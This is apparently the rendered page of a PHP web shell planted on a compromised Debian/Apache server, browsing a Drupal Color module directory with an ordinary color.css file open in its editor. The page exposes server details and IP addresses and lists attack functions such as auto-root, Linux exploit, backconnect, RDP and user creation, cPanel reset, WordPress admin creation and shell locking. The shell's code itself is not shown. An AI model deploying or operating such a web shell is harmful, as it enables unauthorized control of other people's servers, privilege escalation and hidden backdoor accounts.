Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.17.76.163
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
color /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
color-rtl.css
718
B
-rw-r--r--
color.css
1.41
KB
-rw-r--r--
color.info
291
B
-rw-r--r--
color.install
2.23
KB
-rw-r--r--
color.js
7.44
KB
-rw-r--r--
color.module
26.94
KB
-rw-r--r--
color.test
4.18
KB
-rw-r--r--
preview.html
562
B
-rw-r--r--
preview.js
1.43
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : color.css
/** * @file * Stylesheet for the administration pages of the Color module. */ /* Farbtastic placement */ .color-form { max-width: 50em; position: relative; } #placeholder { position: absolute; top: 0; right: 0; /* LTR */ } /* Palette */ .color-form .form-item { height: 2em; line-height: 2em; padding-left: 1em; /* LTR */ margin: 0.5em 0; } .color-form label { float: left; /* LTR */ clear: left; /* LTR */ width: 10em; } .color-form .form-text, .color-form .form-select { float: left; /* LTR */ } .color-form .form-text { text-align: center; margin-right: 5px; /* LTR */ cursor: pointer; } #palette .hook { float: left; /* LTR */ margin-top: 3px; width: 16px; height: 16px; } #palette .down, #palette .up, #palette .both { background: url(images/hook.png) no-repeat 100% 0; /* LTR */ } #palette .up { background-position: 100% -27px; /* LTR */ } #palette .both { background-position: 100% -54px; /* LTR */ } #palette .lock { float: left; /* LTR */ position: relative; top: -1.4em; left: -10px; /* LTR */ width: 20px; height: 25px; background: url(images/lock.png) no-repeat 50% 2px; cursor: pointer; } #palette .unlocked { background-position: 50% -22px; } #palette .form-item { width: 20em; } #palette .item-selected { background: #eee; } /* Preview */ #preview { display: none; } html.js #preview { display: block; position: relative; float: left; /* LTR */ }
Close